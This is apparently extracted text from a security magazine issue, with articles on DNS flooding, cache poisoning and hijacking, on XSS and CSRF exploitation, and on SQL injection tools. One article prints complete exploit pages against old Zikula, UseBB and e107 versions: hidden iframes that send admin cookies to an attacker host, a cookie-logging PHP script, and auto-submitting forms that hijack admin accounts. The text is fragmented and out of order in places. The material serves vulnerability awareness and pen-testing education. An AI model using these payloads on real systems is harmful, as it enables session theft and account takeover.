Set this field to 0, indicating that not providing any answers.

NSCOUNT – an unsigned 16 bit integer specifying the number of name server resource records in the authority records section.

ARCOUNT – an unsigned 16 bit integer specifying the number of resource records in the additional records section.

DNS Request FloodingAs I mentioned above DNS use UDP queries for name resolution. As UDP is a connectionless protocol, a denial of service attack is very difficult to trace and block as they are highly spoofable. A DNS flood works by sending large number of rapid DNS requests, flooding the server with an amount of traffic that it can’t handle so that the performance of the server drops for legitimate requests.

Scapy is a a packet manipulation program that can forge requests and send them to a specified host. Below I show how it can be used in a DNS flooding attack (Listing 1 abd Listing 2).

DNS Response FloodingIn this attach a client or name server, floods a name server with requests for records for which the server is authoritative, using a spoofed source IP address. This results in the flooding of the target network – the network associated with the spoofed IP address – with DNS responses to requests never issued from that network (Figure 2).

Listing 2. Tcpdump output

tcpdump: listening on eth0, link-type EN10MB

(Ethernet), capture size 65535 bytes

15:33:50.292083 IP (tos 0x0, ttl 64, id 1, offset

0, flags [none], proto UDP (17), length 61)

ws003.local.10385 >dns.company.com.domain: [udp sum

ok] 0+ A? 2dat.example.rs. (33)


0, flags [DF], proto UDP (17), length 70)


ok] 10990+ PTR? 2.11.123.10.in-addr.arpa. (42)



dns.company.com.domain> ws003.local.37817: [udp sum

ok] 10990* q: PTR? 2.11.123.10.in-addr.arpa. 1/0/

0 2.11.123.10.in-addr.arpa.PTR dns.company.com. (74)




ok] 35417+ PTR? 119.21.123.10.in-addr.arpa. (44)



dns.company.com.domain> ws003.local.54183: [udp

sum ok] 35417 NXDomain* q: PTR? 119.21.123.10.in-

addr.arpa. 0/1/0 ns: 21.123.10.in-addr.arpa. SOA

dns.company.com. hostmaster.alcoyu.co.yu. 3325 900 600

86400 3600 (131)




sum ok] 0 NXDomain q: A? 2dat.example.rs. 0/1/0

ns: rs. SOA a.nic.rs. hostmaster.nic.rs. 2012041102

10800 3600 2419200 10800 (86)

15:33:50.296217 IP (tos 0xc0, ttl 64, id 17068, offset

0, flags [none], proto ICMP (1), length 142)

ws003.local >dns.company.com: ICMP ws003.local udp

port 10385 unreachable, length 122

IP (tos 0x0, ttl 126, id 27935, offset 0, flags

[DF], proto UDP (17), length 114)


sum ok] 0 NXDomain q: A? 2dat.example.rs. 0/1/0


10800 3600 2419200 10800 (86)


0, flags [none], proto UDP (17), length 65)


ok] 0+ A? e0qysndm.example.rs. (37)



dns.company.com.domain> ws003.local.42090: [udp sum

ok] 0 NXDomain q: A? e0qysndm.example.rs. 0/1/0


10800 3600 2419200 10800 (90)

ATTACK


Recursive Request FloodingThis attack consists of an attacker flooding a target name server with DNS requests, for records for which server is not authoritative. This action has two effects,

one is flooding the target name sever with recursive DNS requests and the other is to attack responsible authoritative name server with DNS request flood.

Exploiting the DNS Trust Model – Domain Hijacking This form of attack could also be called DNS Registration Attacks. To take ownership of domain it is necessary to register at the appropriate Internet registrar, provide the domain contact information, and ensure that the Generic Top Level Domain servers (GTLDs) are updated with the appropriate name server information. It is possible to fake the DNS registration or to change registration details. If the attack is successful and DNS registration records are updated, the attacker can make a “rouge” DNS server and direct clients to fake web sites and mail servers. This attack is preferable for “phishers” because the user is unaware of the fraud.

DNS registration bodies involved several protection controls to avoid DNS domain hijacking to authenticate registration requests.

• Comparison of e-mail addresses in the mail header and Mail-From field in mail is one example.

• Encrypted contact supplied password in database for authentication of registration requests is another.

• The use of PGP keys for signing registration modification requests.

Cache PoisoningVery often DNS server are configured to search for records in their cache as primary sources and then to search zone file data. From an attacker’s perspective it is easier to compromise cache on a name server than to manipulate zones.

A cache poisoning attack can be combined with DNS spoofing attack. By spoofing a counterfeit response to a DNS query, an attacker can remotely update server cache data. When high value of TTL (Time To Live) is returned by an attacker along with spoofed record data, the response data will be cached by the local name server for considerable period of time. This will have

Figure 2. DNS Response �ooding

Figure 3. DNS Cache poisoning

ATTACK


an impact on all clients in same network. Goal of cache poisoning attack is to feed the name server with false address (A) or name server (NS) records with high TTL value, to affect client and server redirection or Internet denial-of-service.

What makes DNS cache poisoning a difficult (or easy) exploit is the use of a 16-bit Transaction ID, an integer that is sent with every DNS query. This integer is supposed to be randomly generated.

In diagram below attacker will try poison cache of Company DNS server for domain answer.com and place in its cache the fake IP address.

In first step of the attack, the attacker contacts the company’s DNS server to check for the domain name for answer.com with the command:

root@bt#dig answer.com @comapnie.com

In the case that there wasn’t a recent request for answer.com at the company’s DNS server, it will make DNS query to root the name server to lookup IP address for answer.com. This query contains the random Transaction ID integer. At the same time, the attacker starts an attack which floods the company’s DNS server with manually crafted packets, that look like the DNS reply expected but it contains the

wrong IP address. Each replay will have a different transaction ID integer, the attacker expects that one of these fake replies will match the transaction ID in query sent by company’s DNS.

It is important that the replies by the attacker reaches the company’s DNS server before the legitimate replies. If the transactional ID integers used by companies DNS are predictable, the attacker have better a chance to fake the demanded IP address. The company’s DNS will use the first reply which appears legitimate by checking transactional ID integer.

What can make this attack even more efficient is to start DDoS to authoritative DNS server for www.answer.com, this will increase the chance that an attacker will predict transactional ID integer (Figure 3).

DNS HijackingIn this kind of attack the attacker tries to “hijack” part of the DNS name space by compromising an upstream server or by submitting a fake name server registration change to the Internet register.

This type of attack has a key benefit in that it does not require the direct compromise of any servers on the target organization’s network. If the attacker’s intention, for example, is to deface the corporate Web page for the victimco.com domain, the attacker can effectively achieve this by leveraging a DNS hijacking attack to redirect Internet Web clients to a new site containing a revised set of Web content (Figure 4).

An attacker can compromise a server which contain the records for answer.com or submit fake request for change on Internet register and become able to change records for answer.com.

After this step attacker can hijack domain answer.com and redirect addressed to legitimate answer.com to fake servers which can run different services (mail, http, https).u

Figure 4. DNS Hijacking

ALEKSANDAR BRATICCISO at respectable �nancial institution in Serbia, focused on pen testing techniques and methodology, vulnerability assessment, incident handling process and risk mitigation.

http://answer.com

http://answer.com

http://netsense.ch/en

XSS & CSRF


In a penetration test, the XSS issues are typically demonstrated with a script function that is short, simple, and visual: the alert box. Many XSS

examples use alert(1) or alert (/XSS/) as a payload but this fails to show the power of XSS vulnerability, and may lead to a so what? reaction from developers not familiar with such a vulnerability. In this article, the

author will show you how to exploit XSS vulnerability (e.g. session hijacking) using Shell of the future.

Shell of the Future – XSS Exploitation ToolShell of the Future is a Reverse Web Shell handler. It can be used to hijack sessions where JavaScript can be injected using XSS or through the browser’s address

XSS Using Shell of the Future

Cross-site scripting (XSS) vulnerabilities in an application potentially allow an attacker to execute malicious script on other users’ systems and hence compromise their sessions, authentication credentials, or even conduct other malicious activity. This can occur if HTML or script can be written to an application data store and be retrieved by other users, or if an attacker can coerce a victim into clicking on a malicious link.

Figure 1. Architecture of Shell of the future (Source: http://www.andlabs.org/tools/sotf/sotf.html)

http://www.andlabs.org/tools/sotf/sotf.html

contact:[email protected]

smart security interface©

the multiplatform security connector integrated with all major PKI applications and TMS platforms; it fully supports all wide spread smart cards and architectures for government, corporate and bank projects; it also interfaces with smart phones, pre-boot systems and TPM

iEnigma®

the software application that turns your smart phone into a PKI smart card; unparalleled convenience for digital identity management; unbeatable security thanks to the support of NFC chips and micro SD cards

plug´n´crypt®

the product line for logical and physical access control covering different form factors: USB token, smart card, micro SD card, soft token, also in combination ��

CSTC®

PKI made simple and accessible to SMB: card initialization, management of ��TMS infrastructure

www.charismathics.com

http://www.charismathics.com/

XSS & CSRF


It is sometimes abbreviated as CSRF or XSRF, depending on who is writing about it. This vulnerability exists because the browser will

automatically transmit the authentication or session cookie to the application with each request to that site. In other words, the application does not always check whether a request came from a user click, or if it merely got invoked because of an img src=”” tag embedded in another page.

Why is it an issue?Firstly, many people have many different web sites open at any one time; for example Facebook and Gmail – if these didn’t implement proper protections then an attacker could cause email or comments to be posted as a particular user.

The worst-case scenario is a naive implementation of a banking website which would transfer funds when the user is logged in by the use of a script with several GET parameters.

http://www.example.com/transfer_funds.php?to_account=

12345678&to_sort=123456&amount=1000

Now as an attacker, all I have to do is insert

<img src=”http://www.example.com/transfer_funds.php?to_ac

count=12345678&to_sort=123456&amount=1000” width=1 height=1>

into a popular webpage and then the donations should start coming my way soon. If anyone who is logged into that bank and views my web page, their browser will make a request to the bank that is indistinguishable by the bank from the user making that same request themselves. In this case, the vulnerability can be mitigated by checking for Referer headers, however this check can be circumvented if there are Cross-Site Scripting problems present in the same site.

As a more concrete example, CSRF was used to great effect by PDP Architect/Gnu Citizen in a series of attacks against particular makes of home router [2]. Below is the example they give for changing the password.

POST /cgi/b/ras/?ce=1&be=0&l0=-1&l1=-1 HTTP/1.1

0=31&1=&30=PASSW0RD

Since we know the IP address defaults to 192.168.0.1, we can construct some javascript to issue such a POST request when this web page is viewed (Listing 1).

(This isn’t great JavaScript, I know; but it is functional and will serve for a proof of concept.) This page can be hosted on a local apache server and visited in a web browser. It should cause a POST request of the above form to the given URL.

Cross-Site Request ForgeryOWASP currently define Cross-Site Request Forgery as “an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated.”[1]. In practical terms, if a user is logged into a web application, and views another web page, the second page can cause the user’s browser to initiate actions on the web application without the user being aware of what is happening.

Get prepared.

We are Expanding Security, a Pen Testing and Training Company. We’ve been preventing deer-in-headlights look since 2006. We offer Pen Testing services plus our Live On Line training classes for ISSMP, ISSAP, CISSP, and Certified Ethical Hacker. We give you online access to materials wherever you are.

You need to keep your job secure, your business strong, and your staff on top of the game. See how good and fun training can be. Our courses are current to changing technology, and our training is the fastest, easiest way to master the relevant data you need NOW.

Sign up for our free weekly PainPill and come to a free class. http://www.expandingsecurity.com/PainPill

…with Freedom, Responsibility, and Security for All ™

www.ExpandingSecurity.com

http://www.ExpandingSecurity.com

XSS & CSRF


This situation is probably aggravated by some misinformation websites and some self-proclaimed security experts, which try to deny

disclosed vulnerabilities by posing them as a feature implemented by design. The problem is that they simply do not understand the exploitation’s vectors of these vulnerabilities and they consider them as benign, as long as they impact webpages which do not remain available to unauthenticated users.

In the past year, High-Tech Bridge SA Security Research Lab has been performing vendor awareness on a non-profit bases, explaining that post-authentication vulnerabilities are dangerous and they should be fixed. This case-by-case approach is paying off by vendor’s patch statistics for our Security Advisories:

• Only 32% of post-authenticated vulnerabilities were fixed during the first and second quarter of 2011.

• However, 65% were fixed during the third and fourth quarter of 2011.

The goal of this article is to demonstrate the real danger of post-authenticated vulnerabilities. We will not explain the basics of web application attacks in this article, as that has already been done many times before by others. We will focus on a practical way to exploit post-authentication XSS’s and CSRF, which remain a highly underestimated attack vector in the security scene.

Post-authentication XSSLet’s start with something very simple. One of the most popular post-authentication vulnerabilities is XSS (Cross Site Scripting). This type of vulnerability is a perfect attack against web-site administrators. Actually, despite the limited exploitation’s vector (against website administrators only), our Research Lab assigns a medium risk level (for a standard XSS) to these vulnerabilities for the simple reason that the most efficient exploitation vector of XSS is carried out against website administrators, not against common users.

For our example, we will take an old version of Zikula, which is vulnerable to XSS against website

XSS & CSRFPractical exploitation of post-authentication

vulnerabilities in web applications

These days many people do not consider post-authentication vulnerabilities dangerous, such as Stored XSS in the administrator’s portion of a web application.

Figure 1. Testing the Proof of Concept

https://www.htbridge.ch/advisory/

https://www.htbridge.ch/advisory/

XSS & CSRF


• 1.jpeg is a normal JPG file with is used as a simple birthday card picture.

• 1.jpg shows the 1.jpeg picture to simulate a simple image behavior. However, an invisible part in the victim’s browser will create an iframe, which will exploit the XSS vulnerability inside the admin panel.

• c.php script simply writes received administrator’s cookie to the log.txt file.

Next we have to have the logged-in administrator to visit our hackhost website to steal his cookies. Here, we will not write a complex scenario, as there are already plenty of social engineering attack examples on Internet. Indeed, we will use a very basic one, as if a website user (malicious hacker in reality) wants to wish a happy birthday to the administrator.

The administrator receives a Birthday Card, which is located at: http://hackhost/1.jpg, the JPG extension will not seem suspicious to the majority of users. On the image below we see what the administrator will see after opening the link in his browser: Figure 2.

administrator vulnerability (details are described in our Security Advisory HTB23039). Several months ago, the vulnerability was rapidly patched by the vendor, and today we are going to demonstrate the full version of the exploit.

First of all let’s test the Proof of Concept (PoC) code from the advisory to make sure that the vulnerability exists. We log into Zikula as an administrator and test by using the proof of concept, which was publicly disclosed on High-Tech Bridge’s website: Figure 1.

XSS works perfectly; we see the value of our cookie. Now let’s see how this vulnerability may be exploited in practice. Let’s imagine that a malicious hacker has a website located at http://hackhost/. Our vulnerable website with Zikula is located at http://targethost/.

We have the following files:

• The .htaccess file causes Apache to handle JPG files as PHP scripts. This will make the malicious link that we are going to send to the administrator less suspicious.

Listing 1. Content of web root of hackhost

root@hackserver:/var/www/hackhost# ls -la

drwxrwxrwx 2 root root 4096 2012-01-01 00:00 .

drwxrwxrwx 17 root root 4096 2012-01-01 00:00 ..

-rw-rw-rw- 1 root root 277694 2012-01-01 00:00 1.jpeg

-rw-rw-rw- 1 root root 288 2012-01-01 00:00 1.jpg

-rw-rw-rw- 1 root root 78 2012-01-01 00:00 c.php

-rw-rw-rw- 1 root root 37 2012-01-01 00:00 .htaccess

root@hackserver:/var/www/hackhost# cat .htaccess

AddType application/x-httpd-php .jpg

root@hackserver:/var/www/hackhost# cat 1.jpg

<html>

<body>

<img src="1.jpeg">

<iframe width="1" height="1" style="display:none"

src="http://targethost/index.php?module=theme&type=admin&func=setasdefault&themename=<script>document.location

.href='http://hackhost/c.php?c='%2Bescape(document.cookie)</script>">

</body>

</html>

root@hackserver:/var/www/hackhost# cat c.php

<?

$f=fopen("log.txt", "a");

fwrite($f, $_GET["c"]."\r\n");

fclose($f);

?>

http://hackhost/1.jpg

https://www.htbridge.ch/advisory/xss_in_zikula.html

http://hackhost/

http://targethost/

XSS & CSRF


As soon as the logged administrator sees this image, his admin account is compromised. Let’s come back to our hackhost and have a look on what we just received:

root@hackserver:/var/www/hackhost# cat log.txt

_zsid2=655085aceec73b6e3aacb230a344bc88f169c20d;

Perfect, we now have administrator’s cookie. Let’s go back to the vulnerable http://targethost/: Figure 3.

We have not logged into the system, so we do not have any rights. Now, let’s modify our admin cookie, using the FireCookie plug-in for Firebug in Firefox and use the intercepted Session ID of the administrator: Figure 4.

Refresh the page with the new cookie enabled, and go to the administration portion of the web site: Figure 5.

We are now logged-in as the Zikula administrator with full rights. This is a very simple example, but it is a very common exploitation attempt for post-authentication XSS vulnerabilities, which are quite often wrongly considered as benign by unaware people.

Client side attack through CSRFAnother example of post-authenticated vulnerability is CSRF or XSRF, (Cross Site Request Forgery). Let’s take the example of the CSRF vulnerability, which was discovered in a previous version of UseBB (vulnerability

details are described in our HTB22913 Security Advisory), which was also patched by the vendor several months ago.

Our target will again be located at http://targethost/ with the vulnerable version 1.0.11 of UseBB. To exploit this vulnerability, we will need a slightly modified version of our http://hackhost/ used in the previous XSS case.

We can see a new file named form.hml designed to perform CSRF exploitation. Again, we have to make a logged UseBB administrator visit our malicious image located at http://hackhost/1.jpg. Here is what the exploited UseBB administrator will see when the link is opened: Figure 6.

As previously mentioned, there is nothing here which really looks suspicious – this is simply a birthday card, which is coming from a forum member. However, as soon as the administrator opens the link, his Profile’s

Figure 3. Lack of access

Figure 2. Image displayed in browser

Figure 4. Modifying admin cookie

Figure 5. Gain Access

http://targethost/

https://www.htbridge.ch/advisory/multiple_csrf_cross_site_request_forgery_in_usebb.html

http://targethost/

http://hackhost/


XSS & CSRF


Listing 2. Files and their content in hackhost’s web root






-rw-rw-rw- 1 root root 1109 2012-01-01 00:00 form.html





<html>

<body>

<img src=1.jpeg>

<iframe width="1" height="1" style="display:none" src="form.html">

</body>

</html>

<html>

<body>

<form action="http://targethost/panel.php?act=editprofile" method="post" name="main" id="main">

<input type="hidden" name="displayed_name" value="admin">

<input type="hidden" name="real_name" value="">

<input type="hidden" name="avatar_remote" value="">

<input type="hidden" name="birthday_month" value="">

<input type="hidden" name="birthday_day" value="">

<input type="hidden" name="birthday_year" value="">

<input type="hidden" name="location" value="">

<input type="hidden" name="website" value="">

<input type="hidden" name="occupation" value="">

<input type="hidden" name="interests" value="">

<input type="hidden" name="signature" value="">

<input type="hidden" name="email" value="[email protected]">

<input type="hidden" name="msnm" value="">

<input type="hidden" name="yahoom" value="">

<input type="hidden" name="aim" value="">

<input type="hidden" name="icq" value="">

<input type="hidden" name="jabber" value="">

<input type="hidden" name="skype" value="">

<input type="submit" value="OK">

</form>

<script>

document.main.submit();

</script>

</body>

</html>

XSS & CSRF


email will be changed to [email protected] by our form.html CSRF code, as if it was the real administrator who legitimately changed his email address by using the designed function of UseBB: Figure 7.

Now we simply need to use UseBB password recovery feature to get a new administrator password on [email protected] email: Figure 8.

After receiving the administrator’s password by email, we can log as UseBB administrator: Figure 9.

This is a very simple example of CSRF, but it is a quite efficient proof of concept and the reason why this vulnerability was reported to the vendor, who in turn agreed that it was a serious issue by providing a new release to his customers.

When CSRF combines with XSSNow, let’s have a look at a more complex exploit using a hybrid approach, which relies on both XSS and CSRF. In this example, we will use the CSRF and stored XSS vulnerabilities in the admin panel of e107. Details are described in our Security Advisory HTB23004, and these vulnerabilities have also been fixed by the vendor.

One of the scripts (users_extended.php) in the e107 administrator panel, is vulnerable to stored XSS, (Persistent XSS), as well as to CSRF attacks. In this case, a simple XSS in the script, without the CSRF would be pretty useless from an attacker’s point of view. In a same way, the script would not represent a big value for hackers if it was only vulnerable to CSRF, because the vulnerable code does not perform any critical or sensitive actions, such as the password change that we used in our previous CSRF example. However in this case, we have a perfect

combination of XSS and CSRF together, as in many others High-Tech Bridge’s advisories. Usually, vendors do not implement CSRF protection in their administration scripts, because they may consider it useless. Sometimes, it may be true and sometimes not. If developers miss an XSS somewhere, then they are faced with a cocktail, which may open a door to full system compromise.

In the present case, the vulnerable script allows the website administrator to create a custom field for user profiles. One of the script parameters named user_include is vulnerable to Stored XSS. The complexity is that the vulnerable field is edited and displayed on two different pages. This inaccurately makes some people believe that such a vulnerability is not dangerous at all. So let’s start exploiting it.

We will again consider that the vulnerable version of e107 is located at http://targethost/ and that the hacker’s server is located at http://hackhost/, content of which will be similar to our previous examples with classic post-authenticated XSS and CSRF.

In this case 1.jpg is a little bit more complex and performs 3 different actions:

• It shows a legitimate Happy Birthday image (1.jpeg)• An invisible iframe is included in form.html, which

exploits the CSRF vulnerability and adds new field with malicious Javascript code inside that steals the user’s cookie (this is possible because our script is vulnerable to XSS).

• Two seconds after loading form.html, 1.jpg will request the users_extended.php, script with stored XSS attack code (inserted in step 2).

Figure 6. Suspicious Happy Birthday

Figure 7. Getting new password

Figure 8. Receiving the administrator’s password

Figure 9. Logging as UseBB administrator

https://www.htbridge.ch/advisory/multiple_vulnerabilities_in_e107_1.html

http://targethost/

http://hackhost/

XSS & CSRF


Listing 3. A content of hackerhost web root


итого 80





-rw-rw-rw- 1 root root 78 2012-01-01 00:00 c.php

-rw-rw-rw- 1 root root 846 2012-01-01 00:00 form.html





<html>

<body>

<img src=1.jpeg>

<iframe width="1" height="1" style="display:none" id=f1 src='form.html'></iframe>

<script>

setTimeout("document.getElementById('f1').src='http://targethost/e107_admin/users_extended.php'",2000);

</script>

</body>

</html>

root@hackserver:/var/www/hackhost# cat form.html

<form method="POST" action="http://targethost/e107_admin/users_extended.php?editext" name=m>

<input type="hidden" name="user_field" value="abcde1f1">

<input type="hidden" name="user_text" value="12121">

<input type="hidden" name="user_type" value="1">

<input type="hidden" name="user_include" value=""><script>document.location.href='http://hackhost/c.php?c='+esca

pe(document.cookie);</script>">

<input type="hidden" name="add_field" value="1">

<input type="hidden" name="user_parent" value="0">

<input type="hidden" name="user_required" value="0">

<input type="hidden" name="user_applicable" value="255">

<input type="hidden" name="user_read" value="0">

<input type="hidden" name="user_write" value="253">

<input type="hidden" name="user_hide" value="0">

<input type=submit>

</form>

<script>

document.m.submit();

</script>

root@hackserver:/var/www/hackhost# cat c.php

<?

$f=fopen("log.txt", "a");

fwrite($f, $_GET["c"]."\r\n");

fclose($f);

?>

XSS & CSRF


Here is our malicious link that a log e107 administrator whould open: http://hackhost/1.jpg.

As before, the administrator will not see any suspicious activities, except the Birthday Card: Figure 10.

However, both XSS and CSRF vulnerabilities were successfully exploited. As we have already seen in the XSS example, e107 administrator’s cookie will be passed to c.php, which will store it in the log.txt file: Listing 4.

Also, we can now simply edit the cookie and refresh the page and you have exploited the administrator’s page! We are now logged as the e107 admin.

We now have access to all of the administrative functions and unlimited control of the e107.

Conclusion The three client-side attacks described in this article show that post-authenticated vulnerabilities are also dangerous, despite the fact they do not impact webpages available to non-authenticated users. They are far from

Figure 10. Dangerous Birthday Card

Figure 11. Exploiting the administrator’s page

Figure 12. Unlimited access

MARSEL NIZAMUTDINOVMarsel Nizamutdinov, Head of Research & Development Department at High-Tech Bridge SA, web application security expert, author of „Hacker Web Exploitation Uncovered” (2005).

Listing 4. XSS example

root@hackserver:/var/www/hackhost# cat log.txt

PHPSESSID=a688a485f2ddb7a5ce40610e58d686ce;

e107_tdOffset=-8; e107_tdSetTime=1325883584;

e107_tzOffset=-240; e107cookie=1.f1f19cd495328ce023b

ed1c0d5108d2a;

being implemented by application design and may become an entry point on your system. Moreover, XSS and CSRF, despite highly underestimated on certain security websites and during most penetration tests, do remain a target of choice in the real world.

We hope that this article will improve vendor and user awareness regarding the real dangers of post-authentication vulnerabilities though client-side attack vectors.

We would also like to highlight the efforts of Secunia, who educates a lot to vendor’s and user’s awareness about post-authentication vulnerabilities. u


http://www.isaffuari.com/

XSS & CSRF


In particular, issues stem from how it handles same origins and authority. Some of the issues can not be fixed in browsers as the real problem is how

web applications handle actions. These vulnerabilities are easy to locate and perform attacks against whilst allowing an attacker to completely compromise an account and/or compromise the host.

The problem is seen when the browser has stored authentication data for the victimsite.com domain/origin. Data such as credential cookies, session cookies, basic/digest authorization depending on attack vector[8], and possibly other stored authentication data the browser manages. This data is used when another domain makes a request for external resources like images, videos, scripts, etc. Here’s how html would be used to grab an image from victimsite.com and load it in attacksite.com’s origin:

<img src=”http://victimsite.com/img.jpg” />

When the user’s browser visits attacksite.com and sees this image tag then it will grab this resource by making the appropriate request for the client. Assume the user is logged in with an authenticated=yes cookie. A stripped down request for this image is:

GET /img.jpg HTTP/1.1

Cookie: authenticated=yes

Host: victimsite.com

The authenticated cookie for victimsite is added by the browser when making the request for victimsite.com/img.jpg. This allows us to perform authenticated actions without ever having to authenticate ourselves. Read further for theoretical and real-world exploits on how this behavior can be abused. The focus of this article will be around the php language, but csrf issues exist throughout other languages.

+Remote VectorThe easiest way to exploit this issue is with cross-origin communication as seen with the previous section’s attacksite.com and victimsite.com image scenario. Please re-read that section if you do not understand how a remote vector (different origin) would work.

+Local VectorWhile the name does say cross-site, the vulnerability can be exploited in the context of the same origin and never require access to resources from another origin. This is possible by chaining other exploits like cross-site scripting (XSS), which will be covered more later, or simply abusing any form of valid injection points. Think about forums or blogs where you have the ability to upload avatars from a supplied url or use bbcode (bulleting board code, a markup language for forums) [11] to display images or movies in comments.

Discovering Modern CSRF Patch Failures

Cross-site request forgery (CSRF/XSRF) vulnerabilities allow an attacker to perform authenticated actions without authenticating as the user. The issue revolves around general browser architecture and its handling of the web origin policy [1].

XSS & CSRF


Among vulnerabilities found in web applications there are logical vulnerabilities such as Business Logic flaws. Which allows an attacker

to manipulate financial data in web applications, such as the ones used for online-banking, EPS and other e-commerce sites.

There are two types of Business Logic flaws: server-side and client-side. First one allows the user of the site to manipulate the site’s functionality to increase his finances, second one allows an external attacker to manipulate the site’s functionality to increase his finances, by decreasing finances of the user of the site. And I have found both types of such vulnerabilities many times since 2005.

Taking into account that Business Logic flaws logical vulnerabilities, then they belong to class the Abuse of Functionality (WASC-42) [1]. It is the server-side type. The attack occurs at special using of functionality of the site, which was not expected by its developers.

But besides server-side Business Logic vulnerabilities, there are also client-side ones. Which belong to the class Cross-Site Request Forgery (WASC-09) [2]. The essence of such attack comes from conducting a CSRF-attack on the user with the purpose of manipulation of his finances (and functionality of the site being used exactly as it was intended by its developers). And the second type of these vulnerabilities is more widespread then the first one.

Example of Business Logic CSRFExample of such vulnerability, which I happened to meet many times at different e-commerce sites, it’s manipulation with withdrawing of money to electronic wallets. (i.e. abusing occurs of the functionality for withdrawing of money from a user’s account).

With the existence of CSRF vulnerabilities at the site, the scenario of the attack will be the next:

• Conduct CSRF-attack on the user, to change his wallet (e.g. WebMoney, PayPal, etc.) to attacker’s wallet.

• Conduct second CSRF-attack on the user to initiate withdrawing of money (to wallet specified in the account).

Usually two steps of the attack (two requests) are required, because process of changing the wallet and withdrawal of money is divided into separate functionalities. But if at a vulnerable site these two operations are joined into one functionality, then it’s possible to send one request – for withdrawal of money to a specified wallet. In two steps scenario the attack will be the next:

• Send request to change the wallet: http://e-commerce/user?wallet=attackerwallet

• Send request to withdraw money: http://e-commerce/user_money?withdraw=1

Business Logic Vulne-rabilities via CSRF

Cross-Site Request Forgery (CSRF) vulnerabilities can be used for different nasty things, but the most dangerous one is stealing of money from users’ accounts. Which I’ll tell you about in this article.

http://e-commerce/user?wallet=attackerwallet

http://e-commerce/user?wallet=attackerwallet

http://e-commerce/user_money?withdraw=1

http://e-commerce/user_money?withdraw=1

XSS & CSRF


Almost all network devices are vulnerable to CSRF [1] due to misunderstanding of this threat by developers of such devices. So attackers

can conduct remote CSRF attacks on network devices, such as routers, Wi-Fi Access Points and others, to do many different nasty things. Attackers can DoS them, disable different functionalities and change different settings, which allows them to take devices under full control (and take control on the user\s’ traffic through these devices).

Such vulnerabilities exist in different network devices, such as Iskra Callisto 821+, D-Link DSL-500T ADSL Router and D-Link DAP 1150, vulnerabilities in which I’ve found and disclosed at my site. And by using CSRF attacks on these vulnerabilities the attacker can receive full control of these devices.

Possibilities of CSRF Attacks on Network DevicesDevelopers of network devices don’t attend enough to security (vulnerabilities in such devices are found all the time), especially CSRF, because they think that devices will reside in a LAN and will not accessible from Internet. But it’s not true, when such devices resides in a LAN, which has computers with access to Internet (CSRF attacks can be conducted via the browsers of the users at these computers). Not mentioning that there is also a threat of local attacks

– from malicious local attackers or viruses – so developers should not leave their devices with remote or local vulnerabilities.

For example routers and ADSL modems, which allow users to access the Internet, are typically affected devices. These can be attacked remotely via CSRF from the Internet. For external attackers the most interest represent such network devices as routers and other devices with router-functionality (ADSL modems, Wi-Fi Access Points, etc.). Because it’s possible to setup these devices in such way, that attacker will take control of the traffic – all traffic (such as DNS requests) will be send via his own server, allowing him to sniff confidential data and conduct phishing attacks on all users in a LAN who are using these devices to access the Internet.

Real attacks on Network DevicesLet’s see how real attacks can be conducted on example of Iskra Callisto 821+ and D-Link DAP 1150. Callisto 821+ it’s ADSL Router (and similar vulnerabilities can be in all other devices from Iskra). The DAP 1150 is a Wi-Fi Access Point and router (similar vulnerabilities can be in all other devices from D-Link).

There can be different attacks created. Let’s take a look at two attacks, which are very advantageous for the attackers. In the first scenario the attacker will conduct part of the actions remotely and part manually

CSRF Attacks on Network Devices

Similar to vulnerabilities in web applications on web sites, there are also vulnerabilities in the admin panels of different network devices, including Cross-Site Request Forgery (CSRF) vulnerabilities. Which can be attack similarly to web sites – by attacking users who have access to these network devices.

SQL INJECTION


NTO SQL Invader is a SQL injection exploitation tool. It gives the ability to quickly and easily exploit or demonstrate SQL injection vulnerabilities in

Web applications. With a few simple clicks, a penetration tester will be able to exploit a vulnerability to view the list of records, tables and user accounts of the back-end database. It has been designed to assist a penetration tester in demonstrating the impact of SQL injection vulnerability in a web application penetration test. NTO SQL Invader has the following features:

• Easy to use – The graphic user interface of the tool enables a penetration tester to simply paste an injectable request found by a web application vulnerability scanner or feed a detailed request straight from a web application scan report. He/she can then control how much information is gathered.

• Clearly presents evidence – Unlike other SQL injectors that provide all data via command line, NTO SQL Invader provides the data in an organised manner that is useful for executive meetings as well as technical analysis and remediation.

• Enables easy transport of logging data – All of the data gathered from NTO SQL Invader can be saved into a CSV file so the reports can be included as penetration evidence as part of a presentation or proof of concept.

NTO SQL Invader is available from: ntobjectives.com. Once you have executed the program, the following screen will be displayed: Figure 1.

NTO SQL Invader

SQL Injection is an attack in which the attacker manipulates input parameters that directly affect an SQL statement. This usually occurs when no input sanitisation is conducted. Depending on permissions, an attacker may be able to read database contents or even write to the database. In this article, the author will show you how to exploit SQL injection vulnerability using NTO SQL invader.

Figure 2. Exploit KB Vulnerable Web App main pageFigure 1. NTO SQL Invader main screen

http://www.ntobjectives.com/sqlinvader

Global��Management Recruitment

��

��

��

��

��

��Permanent

��

��

��

��

��

��

��

��

��

��

��

��

��

http://www.acumin.co.uk

SQL INJECTION


In this article, the author will show you how to perform SQL injection pen-testing using open source and free tools available for Windows and Linux.

SQL Injection Tools for WindowsNetsparker community edition is a powerful web application vulnerability scanner, which can detect and report potential website security problems and allow you to resolve them before they are used by hackers.

SQL Injection Pen-Testingusing Open Source and Free Tools

SQL Injection is an attack in which the attacker manipulates input parameters which directly affect an SQL statement. This usually occurs when no input sanitisation is conducted. Depending on permissions, an attacker may be able to read database contents or even write to the database.

Figure 1. Netsparker community edition main screen

Figure 3. Netsparker community edition successfully obtained the version of back-end database

Figure 2. Netsparker community edition scan results Figure 4. Havij free version main screen

��

��

��

��

��

��

��

��

http://www.pannone.com

SQL INJECTION


Databases are the backbone of most commercial websites on the internet today. They store the data that is delivered to website visitors

(including customers, suppliers, employees, and business partners). Backend databases contain lots of juicy information that an attacker may be interested in. Data such as: User credentials, PII, PII, confidential company information, and anything other data that a legitimate user may need access to through a web portal. At its most basic form, web applications allow legitimate website visitors to submit and retrieve data over the Internet using nothing more than a web browser which allow the internet to be the giant consumer market that it is.

SQL Injection is the attack technique which attempts to pass SQL commands through a web application for execution by the backend database. If not sanitized properly, web applications may result in SQL Injection attacks that allow hackers to view or modify information from the database. The attack tries to convince the application to run SQL code that will result in access that was not intended by the application developers. The attacker uses SQL queries and creativity to bypass typical controls that have been put in place.

Common web application features introduce the SQL injection attack vector. These features include login pages, search pages, e-commerce checkout systems,

